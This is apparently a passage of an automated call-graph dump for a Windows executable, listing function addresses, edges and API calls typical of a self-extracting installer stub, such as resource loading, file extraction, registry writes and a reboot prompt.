3200 7ff650544e01 SendMessageA 3198->3200 3199->3198 3200->3185 3082 7ff6505487a0 3089 7ff650547f58 3082->3089 3085 7ff6505487d2 WriteFile 3086 7ff6505487ca 3085->3086 3087 7ff650548809 3085->3087 3087->3086 3088 7ff650548835 SendDlgItemMessageA 3087->3088 3088->3086 3090 7ff650547f64 MsgWaitForMultipleObjects 3089->3090 3091 7ff650547fd6 3090->3091 3092 7ff650547f8c 3090->3092 3091->3085 3091->3086 3092->3090 3092->3091 3093 7ff650547fad PeekMessageA 3092->3093 3094 7ff650547f9c DispatchMessageA 3092->3094 3093->3092 3094->3093 3201 7ff650548660 3202 7ff6505486c1 ReadFile 3201->3202 3203 7ff65054868d 3201->3203 3202->3203 3204 7ff650548e60 _XcptFilter 3205 7ff6505410f0 __getmainargs 3206 7ff6505478ae 3207 7ff6505478d7 3206->3207 3208 7ff650547b86 EndDialog 3206->3208 3209 7ff6505478e7 3207->3209 3210 7ff650547b02 GetDesktopWindow 3207->3210 3211 7ff6505478eb 3208->3211 3209->3211 3213 7ff6505478fb 3209->3213 3214 7ff6505479b5 GetDlgItemTextA 3209->3214 3212 7ff650543c8c 14 API calls 3210->3212 3215 7ff650547b19 SetWindowTextA SendDlgItemMessageA 3212->3215 3216 7ff650547998 EndDialog 3213->3216 3217 7ff650547904 3213->3217 3223 7ff6505479de 3214->3223 3238 7ff650547a69 3214->3238 3215->3211 3218 7ff650547b5c GetDlgItem EnableWindow 3215->3218 3216->3211 3217->3211 3219 7ff650547911 LoadStringA 3217->3219 3218->3211 3220 7ff65054793d 3219->3220 3221 7ff65054795e 3219->3221 3227 7ff6505461e8 24 API calls 3220->3227 3243 7ff650543950 LoadLibraryA 3221->3243 3222 7ff6505461e8 24 API calls 3222->3211 3226 7ff650547a14 GetFileAttributesA 3223->3226 3223->3238 3229 7ff650547a28 3226->3229 3230 7ff650547a7a 3226->3230 3242 7ff650547957 3227->3242 3228 7ff65054796b SetDlgItemTextA 3228->3211 3228->3220 3232 7ff6505461e8 24 API calls 3229->3232 3231 7ff65054887c CharPrevA 3230->3231 3234 7ff650547a8e 3231->3234 3235 7ff650547a4b 3232->3235 3233 7ff650547acf EndDialog 3233->3211 3236 7ff650545ed8 31 API calls 3234->3236 3235->3211 3237 7ff650547a54 CreateDirectoryA 3235->3237 3239 7ff650547a96 3236->3239 3237->3230 3237->3238 3238->3222 3239->3238 3240 7ff650547aa1 3239->3240 3241 7ff650545b50 38 API calls 3240->3241 3241->3242 3242->3211 3242->3233 3244 7ff650543b5f 3243->3244 3245 7ff650543994 GetProcAddress 3243->3245 3249 7ff6505461e8 24 API calls 3244->3249 3246 7ff650543b49 FreeLibrary 3245->3246 3247 7ff6505439b6 GetProcAddress 3245->3247 3246->3244 3247->3246 3248 7ff6505439db GetProcAddress 3247->3248 3248->3246 3250 7ff6505439fd 3248->3250 3251 7ff650543b7e 3249->3251 3252 7ff650543a11 GetTempPathA 3250->3252 3257 7ff650543a5f FreeLibrary 3250->3257 3251->3211 3251->3228 3253 7ff650543a26 3252->3253 3253->3253 3254 7ff650543a2e CharPrevA 3253->3254 3255 7ff650543a48 CharPrevA 3254->3255 3254->3257 3255->3257 3257->3251 3258 7ff6505436ee 3259 7ff650543748 GetDesktopWindow 3258->3259 3260 7ff65054371d 3258->3260 3262 7ff650543c8c 14 API calls 3259->3262 3261 7ff650543733 3260->3261 3263 7ff650543737 EndDialog 3260->3263 3265 7ff6505413e0 7 API calls 3261->3265 3264 7ff65054375f LoadStringA SetDlgItemTextA MessageBeep 3262->3264 3263->3261 3264->3261 3266 7ff6505437c1 3265->3266 3267 7ff6505483fa 3268 7ff6505483bc 3267->3268 3269 7ff6505483fe 3267->3269 3270 7ff65054847d lstrcmpA 3269->3270 3271 7ff650548450 3269->3271 3273 7ff650548474 3270->3273 3274 7ff6505484d4 3270->3274 3272 7ff6505461e8 24 API calls 3271->3272 3272->3273 3274->3273 3275 7ff650548528 CreateFileA 3274->3275 3275->3273 3277 7ff65054855e 3275->3277 3276 7ff6505485e1 CreateFileA 3276->3273 3277->3273 3277->3276 3278 7ff6505485c9 CharNextA 3277->3278 3279 7ff6505485b2 CreateDirectoryA 3277->3279 3278->3277 3279->3278 3280 7ff65054143b RtlCaptureContext RtlLookupFunctionEntry 3281 7ff650541485 RtlVirtualUnwind 3280->3281 3282 7ff6505414c7 3280->3282 3281->3282 3285 7ff650541404 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3282->3285 3286 7ff65054137e 3287 7ff650541396 3286->3287 3288 7ff65054138d _exit 3286->3288 3289 7ff6505413ab 3287->3289 3290 7ff65054139f _cexit 3287->3290 3288->3287 3290->3289 3291 7ff6505416be 3292 7ff6505416f2 3291->3292 3293 7ff6505416cf 3291->3293 3293->3292 3294 7ff6505416eb ?terminate@ 3293->3294 3294->3292 3295 7ff65054813e GlobalAlloc 3296 7ff65054114b 3297 7ff6505418e4 6 API calls 3296->3297 3298 7ff650541159 GetStartupInfoW 3297->3298 3300 7ff65054119b 3298->3300 3302 7ff6505411ad 3300->3302 3303 7ff6505411ca Sleep 3300->3303 3301 7ff6505411bd _amsg_exit 3306 7ff6505411d7 3301->3306 3302->3301 3302->3306 3303->3300 3304 7ff650541259 _initterm 3307 7ff650541276 _IsNonwritableInCurrentImage 3304->3307 3305 7ff65054123a 3306->3304 3306->3305 3306->3307 3307->3305 3308 7ff65054135f _ismbblead 3307->3308 3309 7ff6505412e4 3307->3309 3308->3307 3310 7ff650547fe4 292 API calls 3309->3310 3311 7ff65054131f 3310->3311 3312 7ff650541336 3311->3312 3313 7ff65054132e exit 3311->3313 3312->3305 3314 7ff65054133f _cexit 3312->3314 3313->3312 3314->3305 2246 7ff650541150 2247 7ff650541159 GetStartupInfoW 2246->2247 2289 7ff6505418e4 2246->2289 2250 7ff65054119b 2247->2250 2251 7ff6505411ad 2250->2251 2253 7ff6505411ca Sleep 2250->2253 2252 7ff6505411bd _amsg_exit 2251->2252 2255 7ff6505411d7 2251->2255 2252->2255 2253->2250 2254 7ff650541259 _initterm 2258 7ff650541276 _IsNonwritableInCurrentImage 2254->2258 2255->2254 2256 7ff65054123a 2255->2256 2255->2258 2257 7ff65054135f _ismbblead 2257->2258 2258->2256 2258->2257 2259 7ff6505412e4 2258->2259 2265 7ff650547fe4 GetVersion 2259->2265 2262 7ff650541336 2262->2256 2264 7ff65054133f _cexit 2262->2264 2263 7ff65054132e exit 2263->2262 2264->2256 2266 7ff65054805d 2265->2266 2267 7ff65054800b 2265->2267 2292 7ff650545810 2266->2292 2267->2266 2268 7ff65054800f GetModuleHandleW 2267->2268 2268->2266 2270 7ff650548027 GetProcAddress 2268->2270 2270->2266 2272 7ff650548042 2270->2272 2272->2266 2273 7ff6505480fa 2275 7ff650548106 CloseHandle 2273->2275 2276 7ff65054131f 2273->2276 2275->2276 2276->2262 2276->2263 2280 7ff6505480a4 2280->2273 2282 7ff6505480d9 2280->2282 2283 7ff6505480ae 2280->2283 2285 7ff6505480f5 2282->2285 2286 7ff6505480e2 ExitWindowsEx 2282->2286 2400 7ff6505461e8 2283->2400 2429 7ff6505433bc GetCurrentProcess OpenProcessToken 2285->2429 2286->2273 2290 7ff650541910 6 API calls 2289->2290 2291 7ff65054198f 2289->2291 2290->2291 2291->2247 2293 7ff650548e0d 2292->2293 2294 7ff65054585c memset memset 2293->2294 2437 7ff650545140 FindResourceExA SizeofResource 2294->2437 2297 7ff6505458b6 CreateEventA SetEvent 2298 7ff650545140 7 API calls 2297->2298 2303 7ff6505458f5 2298->2303 2299 7ff6505461e8 24 API calls 2300 7ff650545a37 2299->2300 2470 7ff6505413e0 2300->2470 2301 7ff6505458f9 2304 7ff6505461e8 24 API calls 2301->2304 2302 7ff650545938 2307 7ff650545140 7 API calls 2302->2307 2303->2301 2303->2302 2306 7ff650545a02 2303->2306 2309 7ff650545917 2304->2309 2442 7ff650546768 2306->2442 2308 7ff65054594f 2307->2308 2308->2301 2312 7ff65054595d CreateMutexA 2308->2312 2309->2300 2312->2306 2314 7ff650545981 GetLastError 2312->2314 2314->2306 2319 7ff650545994 2314->2319 2315 7ff650545a14 2315->2299 2316 7ff650545a23 2317 7ff650545a3c FindResourceExA 2316->2317 2318 7ff650545a2b 2316->2318 2321 7ff650545a5d LoadResource 2317->2321 2322 7ff650545a72 2317->2322 2478 7ff6505426b8 2318->2478 2323 7ff6505459a9 2319->2323 2324 7ff6505459c1 2319->2324 2321->2322 2326 7ff650545a86 2322->2326 2327 7ff650545a7a #17 2322->2327 2325 7ff6505461e8 24 API calls 2323->2325 2328 7ff6505461e8 24 API calls 2324->2328 2329 7ff6505459bf 2325->2329 2326->2300 2330 7ff650545a96 2326->2330 2327->2326 2331 7ff6505459db 2328->2331 2332 7ff6505459e0 CloseHandle 2329->2332 2493 7ff650543df0 GetVersionExA 2330->2493 2331->2306 2331->2332 2332->2300 2338 7ff6505446e8 2339 7ff650544735 2338->2339 2340 7ff650544712 2338->2340 2346 7ff65054483c 2339->2346 2649 7ff650544f18 2339->2649 2342 7ff65054471f 2340->2342 2610 7ff6505456c8 2340->2610 2342->2339 2342->2346 2630 7ff650544598 2342->2630 2349 7ff6505413e0 7 API calls 2346->2349 2351 7ff65054484e 2349->2351 2350 7ff650544757 GetSystemDirectoryA 2352 7ff65054887c CharPrevA 2350->2352 2382 7ff6505443cc 2351->2382 2353 7ff650544782 LoadLibraryA 2352->2353 2354 7ff65054479b GetProcAddress 2353->2354 2355 7ff6505447cf FreeLibrary 2353->2355 2354->2355 2356 7ff6505447b6 DecryptFileA 2354->2356 2357 7ff650544879 SetCurrentDirectoryA 2355->2357 2358 7ff6505447ea 2355->2358 2356->2355 2359 7ff650544813 2357->2359 2367 7ff650544897 2357->2367 2358->2357 2360 7ff6505447f6 GetWindowsDirectoryA 2358->2360 2364 7ff6505461e8 24 API calls 2359->2364 2360->2359 2361 7ff650544860 2360->2361 2712 7ff650545b50 2361->2712 2363 7ff650544909 2363->2346 2373 7ff650544931 2363->2373 2740 7ff6505434d8 2363->2740 2365 7ff650544831 2364->2365 2818 7ff650546590 GetLastError 2365->2818 2367->2363 2368 7ff650544933 2367->2368 2371 7ff6505448cd 2367->2371 2750 7ff650544be0 2368->2750 2376 7ff6505464b0 28 API calls 2371->2376 2374 7ff65054496a 2373->2374 2772 7ff65054721c 2373->2772 2374->2346 2378 7ff650544985 2374->2378 2379 7ff6505448f8 2376->2379 2830 7ff650544e34 2378->2830 2379->2346 2820 7ff650547bb8 2379->2820 2384 7ff6505443f4 2382->2384 2383 7ff65054442c LocalFree LocalFree 2383->2384 2384->2383 2386 7ff650544409 SetFileAttributesA DeleteFileA 2384->2386 2392 7ff650544453 2384->2392 2385 7ff6505444f1 2387 7ff650544567 2385->2387 2389 7ff65054450d RegOpenKeyExA 2385->2389 2386->2383 2388 7ff6505413e0 7 API calls 2387->2388 2390 7ff65054457e 2388->2390 2389->2387 2391 7ff65054453e RegDeleteValueA RegCloseKey 2389->2391 2390->2273 2390->2280 2396 7ff650542540 2390->2396 2391->2387 2392->2385 2393 7ff6505444d4 SetCurrentDirectoryA 2392->2393 2394 7ff650548914 4 API calls 2392->2394 2395 7ff6505426b8 16 API calls 2393->2395 2394->2393 2395->2385 2397 7ff650542554 2396->2397 2399 7ff650542566 2396->2399 2398 7ff6505434d8 19 API calls 2397->2398 2398->2399 2399->2280 2401 7ff650546261 LoadStringA 2400->2401 2402 7ff6505463c1 2400->2402 2403 7ff6505462cd 2401->2403 2404 7ff65054628b 2401->2404 2407 7ff6505413e0 7 API calls 2402->2407 2406 7ff650546349 2403->2406 2415 7ff6505462d9 LocalAlloc 2403->2415 2405 7ff650548bb4 13 API calls 2404->2405 2408 7ff650546290 2405->2408 2412 7ff65054635c LocalAlloc 2406->2412 2413 7ff6505463a2 LocalAlloc 2406->2413 2409 7ff650546494 2407->2409 2410 7ff650546299 MessageBoxA 2408->2410 2411 7ff650548ae4 2 API calls 2408->2411 2409->2273 2409->2282 2410->2402 2411->2410 2412->2402 2420 7ff65054638d 2412->2420 2413->2402 2424 7ff650546344 MessageBeep 2413->2424 2415->2402 2421 7ff65054632c 2415->2421 2419 7ff650548bb4 13 API calls 2422 7ff65054642a 2419->2422 2423 7ff65054366c _vsnprintf 2420->2423 2425 7ff65054366c _vsnprintf 2421->2425 2426 7ff650546433 MessageBoxA LocalFree 2422->2426 2427 7ff650548ae4 2 API calls 2422->2427 2423->2424 2424->2419 2425->2424 2426->2402 2427->2426 2430 7ff65054341f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2429->2430 2432 7ff6505433fc 2429->2432 2431 7ff65054349c ExitWindowsEx 2430->2431 2430->2432 2431->2432 2434 7ff650543418 2431->2434 2433 7ff6505461e8 24 API calls 2432->2433 2433->2434 2435 7ff6505413e0 7 API calls 2434->2435 2436 7ff6505434ca 2435->2436 2436->2273 2438 7ff6505451f9 2437->2438 2439 7ff65054518b 2437->2439 2438->2297 2438->2315 2439->2438 2440 7ff650545194 FindResourceA LoadResource LockResource 2439->2440 2440->2438 2441 7ff6505451d3 memcpy_s FreeResource 2440->2441 2441->2438 2443 7ff650546c68 2442->2443 2467 7ff6505467b2 2442->2467 2444 7ff6505413e0 7 API calls 2443->2444 2445 7ff650545a10 2444->2445 2445->2315 2445->2316 2446 7ff650546891 2446->2443 2448 7ff6505468ae GetModuleFileNameA 2446->2448 2447 7ff6505467e4 CharNextA 2447->2467 2449 7ff6505468cf 2448->2449 2450 7ff6505468dc 2448->2450 2534 7ff650548a2c 2449->2534 2450->2443 2452 7ff650546ddc 2542 7ff6505415b8 RtlCaptureContext RtlLookupFunctionEntry 2452->2542 2455 7ff6505468f8 CharUpperA 2458 7ff650546d78 2455->2458 2455->2467 2457 7ff650546d95 ExitProcess 2539 7ff6505429dc 2458->2539 2461 7ff650546d89 CloseHandle 2461->2457 2462 7ff650546a5d CharUpperA 2462->2467 2463 7ff650546a06 CompareStringA 2463->2467 2464 7ff650546abb CharUpperA 2464->2467 2465 7ff650546990 CharUpperA 2465->2467 2466 7ff650546b56 CharUpperA 2466->2467 2467->2443 2467->2446 2467->2447 2467->2452 2467->2455 2467->2462 2467->2463 2467->2464 2467->2465 2467->2466 2468 7ff65054887c CharPrevA 2467->2468 2469 7ff6505489bc IsDBCSLeadByte CharNextA 2467->2469 2468->2467 2469->2467 2471 7ff6505413e9 2470->2471 2472 7ff6505413f4 2471->2472 2473 7ff650541440 RtlCaptureContext RtlLookupFunctionEntry 2471->2473 2472->2273 2472->2338 2474 7ff6505414c7 2473->2474 2475 7ff650541485 RtlVirtualUnwind 2473->2475 2548 7ff650541404 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2474->2548 2475->2474 2479 7ff650542897 2478->2479 2482 7ff6505426c1 2478->2482 2479->2300 2480 7ff650542888 2481 7ff6505413e0 7 API calls 2480->2481 2481->2479 2482->2480 2483 7ff650542751 FindFirstFileA 2482->2483 2483->2480 2485 7ff650542773 2483->2485 2484 7ff6505427ad lstrcmpA 2486 7ff6505427cd lstrcmpA 2484->2486 2487 7ff65054284e FindNextFileA 2484->2487 2485->2484 2485->2487 2488 7ff650542818 2485->2488 2492 7ff6505426b8 8 API calls 2485->2492 2549 7ff65054887c 2485->2549 2486->2485 2486->2487 2487->2485 2490 7ff65054286a FindClose RemoveDirectoryA 2487->2490 2489 7ff650542829 SetFileAttributesA DeleteFileA 2488->2489 2489->2487 2490->2480 2492->2485 2498 7ff650543e52 2493->2498 2500 7ff650543e4b 2493->2500 2494 7ff6505440d0 2496 7ff6505413e0 7 API calls 2494->2496 2495 7ff6505461e8 24 API calls 2495->2494 2497 7ff650544116 2496->2497 2497->2300 2508 7ff650543118 2497->2508 2498->2494 2498->2500 2501 7ff650543fc4 2498->2501 2553 7ff6505422f0 2498->2553 2500->2495 2501->2494 2501->2500 2502 7ff650544083 MessageBeep 2501->2502 2566 7ff650548bb4 2502->2566 2505 7ff65054409f MessageBoxA 2505->2494 2509 7ff650543168 2508->2509 2510 7ff6505432e1 2508->2510 2601 7ff650542590 LoadLibraryA 2509->2601 2511 7ff6505413e0 7 API calls 2510->2511 2513 7ff650543306 2511->2513 2513->2300 2527 7ff6505464b0 FindResourceA 2513->2527 2515 7ff650543179 GetCurrentProcess OpenProcessToken 2515->2510 2516 7ff6505431a3 GetTokenInformation 2515->2516 2517 7ff6505432cc CloseHandle 2516->2517 2518 7ff6505431cc GetLastError 2516->2518 2517->2510 2518->2517 2519 7ff6505431e1 LocalAlloc 2518->2519 2519->2517 2520 7ff6505431fe GetTokenInformation 2519->2520 2521 7ff650543228 AllocateAndInitializeSid 2520->2521 2522 7ff6505432bd LocalFree 2520->2522 2521->2522 2523 7ff650543271 2521->2523 2522->2517 2524 7ff6505432ad FreeSid 2523->2524 2525 7ff65054327e EqualSid 2523->2525 2526 7ff6505432a2 2523->2526 2524->2522 2525->2523 2525->2526 2526->2524 2528 7ff65054654b 2527->2528 2529 7ff6505464eb LoadResource 2527->2529 2531 7ff6505461e8 24 API calls 2528->2531 2529->2528 2530 7ff650546505 DialogBoxIndirectParamA FreeResource 2529->2530 2530->2528 2532 7ff65054656a 2530->2532 2531->2532 2532->2309 2535 7ff650548a87 2534->2535 2538 7ff650548a4d 2534->2538 2535->2450 2536 7ff650548a55 IsDBCSLeadByte 2536->2538 2537 7ff650548a70 CharNextA 2537->2535 2537->2538 2538->2536 2538->2537 2540 7ff6505461e8 24 API calls 2539->2540 2541 7ff650542a03 2540->2541 2541->2457 2541->2461 2543 7ff6505415f5 RtlVirtualUnwind 2542->2543 2544 7ff650541637 2542->2544 2543->2544 2547 7ff650541404 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2544->2547 2550 7ff65054889c 2549->2550 2550->2550 2551 7ff6505488ae 2550->2551 2552 7ff6505488c0 CharPrevA 2550->2552 2551->2485 2552->2551 2560 7ff6505424f2 2553->2560 2562 7ff65054232d 2553->2562 2555 7ff650542517 GlobalFree 2556 7ff650542502 2555->2556 2556->2501 2557 7ff650542360 GetFileVersionInfoSizeA 2558 7ff65054237e GlobalAlloc 2557->2558 2557->2562 2558->2556 2559 7ff65054239e GlobalLock 2558->2559 2559->2560 2561 7ff6505423b9 GetFileVersionInfoA 2559->2561 2560->2555 2560->2556 2561->2562 2563 7ff6505423dd VerQueryValueA 2561->2563 2562->2557 2562->2560 2564 7ff6505424b1 GlobalUnlock 2562->2564 2565 7ff650542496 GlobalUnlock 2562->2565 2581 7ff650542d34 2562->2581 2563->2562 2563->2564 2564->2562 2565->2555 2567 7ff650548bf4 GetVersionExA 2566->2567 2576 7ff650548d26 2566->2576 2569 7ff650548c1d 2567->2569 2567->2576 2568 7ff6505413e0 7 API calls 2570 7ff650544096 2568->2570 2571 7ff650548c40 GetSystemMetrics 2569->2571 2569->2576 2570->2505 2577 7ff650548ae4 2570->2577 2572 7ff650548c57 RegOpenKeyExA 2571->2572 2571->2576 2573 7ff650548c8c RegQueryValueExA RegCloseKey 2572->2573 2572->2576 2575 7ff650548cd6 2573->2575 2573->2576 2574 7ff650548d15 CharNextA 2574->2575 2575->2574 2575->2576 2576->2568 2578 7ff650548b0a EnumResourceLanguagesA 2577->2578 2580 7ff650548b8d 2577->2580 2579 7ff650548b4f EnumResourceLanguagesA 2578->2579 2578->2580 2579->2580 2580->2505 2582 7ff650542f3d GetSystemDirectoryA 2581->2582 2583 7ff650542d73 CharUpperA CharNextA CharNextA 2581->2583 2584 7ff650542f37 2582->2584 2585 7ff650542db0 2583->2585 2586 7ff650542dee 2583->2586 2587 7ff65054887c CharPrevA 2584->2587 2590 7ff650542f5e 2584->2590 2588 7ff650542db6 2585->2588 2589 7ff650542dd5 GetSystemDirectoryA 2585->2589 2592 7ff65054887c CharPrevA 2586->2592 2587->2590 2588->2586 2591 7ff650542dbc GetWindowsDirectoryA 2588->2591 2589->2584 2593 7ff6505413e0 7 API calls 2590->2593 2591->2584 2594 7ff650542e4d RegOpenKeyExA 2592->2594 2595 7ff650542f6d 2593->2595 2594->2584 2596 7ff650542e80 RegQueryValueExA 2594->2596 2595->2562 2597 7ff650542f26 RegCloseKey 2596->2597 2598 7ff650542eb3 2596->2598 2597->2584 2599 7ff650542ebc ExpandEnvironmentStringsA 2598->2599 2600 7ff650542eda 2598->2600 2599->2600 2600->2597 2602 7ff650542689 2601->2602 2603 7ff6505425e5 GetProcAddress 2601->2603 2606 7ff6505413e0 7 API calls 2602->2606 2604 7ff65054267a FreeLibrary 2603->2604 2605 7ff650542603 AllocateAndInitializeSid 2603->2605 2604->2602 2605->2604 2607 7ff65054264c FreeSid 2605->2607 2608 7ff650542698 2606->2608 2607->2604 2608->2510 2608->2515 2611 7ff650545140 7 API calls 2610->2611 2612 7ff6505456e3 LocalAlloc 2611->2612 2613 7ff650545701 2612->2613 2614 7ff65054572f 2612->2614 2615 7ff6505461e8 24 API calls 2613->2615 2616 7ff650545140 7 API calls 2614->2616 2617 7ff65054571f 2615->2617 2618 7ff650545741 2616->2618 2619 7ff650546590 GetLastError 2617->2619 2620 7ff65054577e lstrcmpA 2618->2620 2621 7ff650545745 2618->2621 2629 7ff650545724 2619->2629 2623 7ff650545798 LocalFree 2620->2623 2624 7ff6505457ae 2620->2624 2622 7ff6505461e8 24 API calls 2621->2622 2626 7ff650545763 LocalFree 2622->2626 2625 7ff6505457a7 2623->2625 2627 7ff6505461e8 24 API calls 2624->2627 2625->2342 2626->2625 2628 7ff6505457d0 LocalFree 2627->2628 2628->2629 2629->2625 2631 7ff650545140 7 API calls 2630->2631 2632 7ff6505445af LocalAlloc 2631->2632 2633 7ff650544601 2632->2633 2634 7ff6505445d1 2632->2634 2635 7ff650545140 7 API calls 2633->2635 2636 7ff6505461e8 24 API calls 2634->2636 2637 7ff650544613 2635->2637 2638 7ff6505445ef 2636->2638 2640 7ff650544617 2637->2640 2641 7ff650544654 lstrcmpA 2637->2641 2639 7ff650546590 GetLastError 2638->2639 2648 7ff6505445f4 2639->2648 2642 7ff6505461e8 24 API calls 2640->2642 2643 7ff6505446bc LocalFree 2641->2643 2644 7ff650544672 2641->2644 2645 7ff650544635 LocalFree 2642->2645 2643->2648 2646 7ff6505464b0 28 API calls 2644->2646 2645->2648 2647 7ff650544692 LocalFree 2646->2647 2647->2648 2648->2339 2650 7ff650545140 7 API calls 2649->2650 2651 7ff650544f35 2650->2651 2652 7ff650544f3a 2651->2652 2653 7ff650544f7e 2651->2653 2654 7ff6505461e8 24 API calls 2652->2654 2655 7ff650545140 7 API calls 2653->2655 2656 7ff650544f59 2654->2656 2657 7ff650544f97 2655->2657 2658 7ff650544742 2656->2658 2659 7ff650547bb8 13 API calls 2657->2659 2658->2346 2663 7ff65054521c 2658->2663 2660 7ff650544fa3 2659->2660 2660->2658 2661 7ff650544fa7 2660->2661 2662 7ff6505461e8 24 API calls 2661->2662 2662->2656 2664 7ff650545140 7 API calls 2663->2664 2665 7ff65054525e LocalAlloc 2664->2665 2666 7ff6505452ae 2665->2666 2667 7ff65054527e 2665->2667 2668 7ff650545140 7 API calls 2666->2668 2669 7ff6505461e8 24 API calls 2667->2669 2670 7ff6505452c0 2668->2670 2671 7ff65054529c 2669->2671 2672 7ff6505452fd lstrcmpA LocalFree 2670->2672 2673 7ff6505452c4 2670->2673 2674 7ff650546590 GetLastError 2671->2674 2676 7ff65054538f 2672->2676 2677 7ff650545344 2672->2677 2675 7ff6505461e8 24 API calls 2673->2675 2678 7ff6505452a1 2674->2678 2680 7ff6505452e2 LocalFree 2675->2680 2679 7ff65054566c 2676->2679 2682 7ff6505453a7 GetTempPathA 2676->2682 2686 7ff6505441ec 53 API calls 2677->2686 2681 7ff6505452a7 2678->2681 2683 7ff6505464b0 28 API calls 2679->2683 2680->2681 2685 7ff6505413e0 7 API calls 2681->2685 2684 7ff6505453ca 2682->2684 2693 7ff6505453fd 2682->2693 2683->2681 2843 7ff6505441ec 2684->2843 2688 7ff65054474f 2685->2688 2689 7ff650545364 2686->2689 2688->2346 2688->2350 2689->2681 2691 7ff65054536c 2689->2691 2692 7ff6505461e8 24 API calls 2691->2692 2692->2678 2693->2681 2694 7ff650545451 GetDriveTypeA 2693->2694 2695 7ff650545633 GetWindowsDirectoryA 2693->2695 2697 7ff650545469 2694->2697 2698 7ff65054546e GetFileAttributesA 2694->2698 2700 7ff650545b50 38 API calls 2695->2700 2697->2681 2697->2694 2697->2695 2697->2698 2702 7ff650545b50 38 API calls 2697->2702 2703 7ff6505454ad GetDiskFreeSpaceA 2697->2703 2704 7ff65054332c 25 API calls 2697->2704 2706 7ff65054555a GetWindowsDirectoryA 2697->2706 2707 7ff65054887c CharPrevA 2697->2707 2710 7ff6505455c5 SetFileAttributesA 2697->2710 2711 7ff6505441ec 53 API calls 2697->2711 2698->2697 2700->2693 2701 7ff6505441ec 53 API calls 2701->2693 2702->2697 2703->2697 2705 7ff6505454db MulDiv 2703->2705 2704->2697 2705->2697 2706->2697 2708 7ff650545582 GetFileAttributesA 2707->2708 2708->2697 2709 7ff650545598 CreateDirectoryA 2708->2709 2709->2697 2710->2697 2711->2697 2713 7ff650545b9f GetCurrentDirectoryA SetCurrentDirectoryA 2712->2713 2737 7ff650545b97 2712->2737 2714 7ff650545bf7 GetDiskFreeSpaceA 2713->2714 2715 7ff650545bca 2713->2715 2718 7ff650545c38 MulDiv 2714->2718 2719 7ff650545e16 memset 2714->2719 2717 7ff6505461e8 24 API calls 2715->2717 2716 7ff6505413e0 7 API calls 2720 7ff650544875 2716->2720 2721 7ff650545be7 2717->2721 2718->2719 2723 7ff650545c66 GetVolumeInformationA 2718->2723 2722 7ff650546590 GetLastError 2719->2722 2720->2346 2720->2357 2724 7ff650546590 GetLastError 2721->2724 2725 7ff650545e2e GetLastError FormatMessageA 2722->2725 2726 7ff650545cfd SetCurrentDirectoryA 2723->2726 2727 7ff650545c9e memset 2723->2727 2736 7ff650545bec 2724->2736 2729 7ff650545e70 2725->2729 2733 7ff650545d25 2726->2733 2728 7ff650546590 GetLastError 2727->2728 2730 7ff650545cb6 GetLastError FormatMessageA 2728->2730 2731 7ff6505461e8 24 API calls 2729->2731 2730->2729 2732 7ff650545e8b SetCurrentDirectoryA 2731->2732 2732->2737 2734 7ff650545d68 2733->2734 2738 7ff650545d8c 2733->2738 2735 7ff6505461e8 24 API calls 2734->2735 2735->2736 2736->2737 2737->2716 2738->2737 2899 7ff6505428b8 2738->2899 2741 7ff6505434eb 2740->2741 2742 7ff65054358f 2740->2742 2743 7ff650543588 2741->2743 2744 7ff6505434f4 2741->2744 2919 7ff650543044 GetWindowsDirectoryA 2742->2919 2916 7ff650542f8c RegOpenKeyExA 2743->2916 2746 7ff650543502 RegOpenKeyExA 2744->2746 2748 7ff650543582 2744->2748 2746->2748 2749 7ff650543537 RegQueryValueExA RegCloseKey 2746->2749 2748->2373 2749->2748 2751 7ff650545140 7 API calls 2750->2751 2752 7ff650544bfb FindResourceA LoadResource LockResource 2751->2752 2753 7ff650544c4c 2752->2753 2754 7ff650544e1f 2752->2754 2755 7ff650544c58 GetDlgItem ShowWindow GetDlgItem ShowWindow 2753->2755 2756 7ff650544ca6 2753->2756 2754->2379 2755->2756 2927 7ff650547e28 #20 2756->2927 2759 7ff650544cb9 #20 2760 7ff650544caf 2759->2760 2761 7ff650544d21 #22 2759->2761 2762 7ff6505461e8 24 API calls 2760->2762 2763 7ff650544da5 2761->2763 2764 7ff650544d65 #23 2761->2764 2765 7ff650544da3 2762->2765 2766 7ff650544db1 FreeResource 2763->2766 2767 7ff650544dc5 2763->2767 2764->2760 2764->2763 2765->2763 2766->2767 2768 7ff650544def 2767->2768 2769 7ff650544dd1 2767->2769 2768->2754 2771 7ff650544e01 SendMessageA 2768->2771 2770 7ff6505461e8 24 API calls 2769->2770 2770->2768 2771->2754 2773 7ff650547270 2772->2773 2789 7ff650547287 2772->2789 2774 7ff650545140 7 API calls 2773->2774 2774->2789 2775 7ff65054729d memset 2775->2789 2776 7ff6505473b6 2778 7ff6505461e8 24 API calls 2776->2778 2777 7ff650545140 7 API calls 2777->2789 2779 7ff6505473d5 2778->2779 2780 7ff650547655 2779->2780 2782 7ff6505413e0 7 API calls 2780->2782 2783 7ff650547666 2782->2783 2783->2374 2784 7ff650547457 CompareStringA 2785 7ff65054773f 2784->2785 2784->2789 2785->2780 2787 7ff650547759 RegOpenKeyExA 2785->2787 2787->2780 2791 7ff65054778e RegQueryValueExA 2787->2791 2788 7ff650547700 2790 7ff6505461e8 24 API calls 2788->2790 2789->2775 2789->2776 2789->2777 2789->2780 2789->2784 2789->2785 2789->2788 2792 7ff650547646 LocalFree 2789->2792 2793 7ff650547614 LocalFree 2789->2793 2800 7ff650547355 CompareStringA 2789->2800 2807 7ff6505474f6 2789->2807 2954 7ff650541d28 2789->2954 2993 7ff650541a08 memset memset RegCreateKeyExA 2789->2993 3020 7ff650547010 2789->3020 2794 7ff65054771f LocalFree 2790->2794 2796 7ff650547883 RegCloseKey 2791->2796 2797 7ff6505477d3 memset GetSystemDirectoryA 2791->2797 2792->2780 2793->2785 2793->2789 2794->2780 2796->2780 2798 7ff65054781a 2797->2798 2799 7ff650547804 2797->2799 2803 7ff65054366c _vsnprintf 2798->2803 2802 7ff65054887c CharPrevA 2799->2802 2800->2789 2802->2798 2804 7ff650547843 RegSetValueExA 2803->2804 2804->2796 2805 7ff650547507 GetProcAddress 2805->2807 2808 7ff650547688 2805->2808 2806 7ff6505476db 2809 7ff6505461e8 24 API calls 2806->2809 2807->2805 2807->2806 2816 7ff6505475ec FreeLibrary 2807->2816 2817 7ff65054763a FreeLibrary 2807->2817 3036 